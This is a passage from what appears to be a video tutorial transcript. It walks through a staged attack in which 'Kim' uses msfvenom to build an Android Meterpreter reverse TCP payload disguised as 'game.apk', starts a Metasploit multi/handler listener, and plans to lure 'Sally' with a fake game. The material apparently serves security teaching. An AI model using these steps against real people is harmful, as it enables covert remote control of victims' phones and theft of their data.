This command outputs a long list of platforms and payload types, everything from Windows and Linux to macOS and Android. Scrolling through the list, Kim confirms that the Android MeterPrinter reverse TCP payload is indeed available. This will be the heart of the attack, the code that connects the victim's phone back to Kim's system. Now that Kim has verified the payload he wants to use is available in MSF Venom, he is ready to craft the malicious APK file. The command he runs is msfvenom-p, followed by the payloads, here a reverse shell for Android over TCP. Then lhost followed by the IP address of a machine he controls. In this case, its attacker machine IP address. This is where the victim's system will connect back. Then lport followed by a port number on Kim's machine that will listen for the incoming connection. Here 4444 is used, which is the default listening port for many Metasploit reverse shell payloads. And finally -o to defines the output file, the name of the APK file Kim is creating. In this case, he names it game.apk to make it look like a harmless mobile game. Kim hits enter, and within seconds, the malicious APK is ready. MSF Venom confirms that the payload has been successfully generated. It's 10,232 bytes in size, and it's been saved as game.apk. The file is stored in the current working directory. In this case, that's the desktop folder. At first glance, it looks like an innocent Android game. Just another APK waiting to be installed, but this file is anything but harmless. Once it's opened on a victim's phone, it will silently establish a connection back to Kim, giving him full access to the device. Now that Kim has the malicious file, he can send it to Sally. But first, he needs to set up a listener, like a walkie-talkie waiting for the victim response. This listener will be ready and waiting for the reverse shell to connect back the moment Sally clicks on the file. Kim uses the Metasploit framework for this. He opens a new terminal and types msf console. This launches the Metasploit main interface, where it can configure the listener to wait for the connection from Sally's Android device. Setting up the multi-handler listener is done in 3 steps. First, Kim tells Metasploit that he wants to use that listener module. To do this, he types use exploit/multi/handler. This module acts like a generic listener, ready to handle incoming connections from payloads we have generated. Next, Kim tells that listener what kind of payload it should expect by typing set payload android/meterpreter/reverse TCP. In other words, he is saying, hey listener, get ready for a reverse TCP meterpreter connection from an Android device. Each payload has its own set of arguments, also called options or variables, that need to be configured. For example, the attacker's IP address and the listening port. To see exactly which ones are required for the selected payload, Kim types show options. This displays a table of all configurable arguments for the chosen payload, along with whether they are required and their current values. As we can see here, all required arguments are already set. Expect lhost. Lhost is the local host, the IP address the victim's Android device will connect back to. In this case, it's Kim's own IP address, or the IP of a machine he controls that's running the listener. Let's go ahead and set it. In Metasploit, setting a payload argument is done by typing set, followed by the argument name, and then the value we want to assign. If we run show options again, we can see that all variables, including lhost, are now ready. With everything in place, Kim launches the listener with the command run. The port is now open, and Metasploit sits quietly, waiting for the victim to take the bait. With the malicious APK file ready and the listener standing by, Kim now needs a way to deliver the payload to the target. In real-world attacks, this is often done through social engineering, tricking the victim into installing the app by making it look useful, fun, or urgent. In our case, Kim will pose as a friendly developer, sharing a link to a simple mobile game he just made.